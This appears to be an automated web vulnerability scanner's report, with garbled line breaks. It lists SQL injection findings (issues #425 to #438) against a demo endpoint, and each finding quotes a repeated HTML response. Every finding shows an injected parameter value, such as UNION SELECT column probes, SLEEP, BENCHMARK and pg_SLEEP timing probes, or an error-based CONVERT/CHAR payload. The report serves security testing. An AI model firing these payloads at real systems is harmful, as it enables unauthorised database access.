src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #425\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26\n#ResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #426\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.iopg_SLEEP(5)\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.ioCWE-ID CWE-89\nIssue Number #427\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A'\n)),4,5,6,7,8,9,10,11#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #428\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"width=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #429\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io AND 7506=9091 AND ('5913=5913\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #430\nSQL InjectionScan\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 1,2--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #431\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/png\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #432\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 1,2,3,4,5,6,7\n#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #433\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1Test Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #434\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 20--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...Alerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #435\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioAND false\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #436\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 1,2,3,4#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #437\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io '%20and%201=2%20--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89Issue Number #438\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioAND 5650=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+\nCHAR(122)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (\n5650=5650) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(\n113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113)))\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link 